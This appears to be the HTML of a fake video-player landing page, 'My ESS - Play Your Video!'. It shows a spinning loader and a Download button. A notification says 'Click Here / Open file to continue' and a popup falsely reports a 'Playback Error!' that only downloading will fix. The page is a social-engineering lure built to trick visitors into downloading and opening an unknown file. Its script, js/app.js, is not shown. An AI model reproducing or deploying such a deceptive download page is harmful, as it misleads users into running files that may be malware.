<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>My ESS - Play Your Video!</title>
    <link rel="stylesheet" href="css/style.css">
</head>
<body class="yellow-bg">

<div class="wrapper">
    <div class="content-wrap">
        <main>
            <section class="default-screen">
                <div class="container">
                    <div class="title big">
                        <span>Play Your Video!</span>
                    </div>
                    <div class="def-content" id="download">
                        <img src="img/video-2.png" alt="">
                        <div class="loader">
                            <div class="load-wraper">
                                <div class="ball"></div>
                                <div class="ball1"></div>
                            </div>
                        </div>
                    </div>
                    <div class="btn-wrap">
                        <a href="#" class="btn btn-def">
                            <img class="down-img" src="img/big-download.png" alt="">
                            <span>Download</span>
                        </a>
                    </div>
                </div>
            </section>
        </main>
    </div>
</div>

<footer>
    <div class="container">
        <div class="foot-nav black">
            <a href="privacy.html">Privacy</a>
            <a href="#">Term of use</a>
        </div>
        <a href="index.html" class="logo-foot">
            <img src="img/foot-logo-w.png" alt="">
        </a>
    </div>
</footer>

<div class="notif flex-cont align-center active">
    <img class="ok-down" src="img/style-arr-w.png" alt="">
    <div class="notif-text">
        <p>Click Here</p>
        <p>Open file to continue</p>
    </div>
    <img class="exit-notif" src="img/exit-pop-b.png" alt="">
</div>

<div class="popup download-pop">
    <div class="pop-continue flex-cont align-center justify-c">
        <img class="exit-pop" src="img/exit-pop-b.png" alt="">
        <div class="pop-continue-text">
            <p>Playback Error!</p>
            <p>To continue please</p>
            <p>click "Download" button</p>
        </div>
        <img class="icon-download" src="img/icon-download-w.png" alt="">
    </div>
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/app.js"></script>
</body>
</html>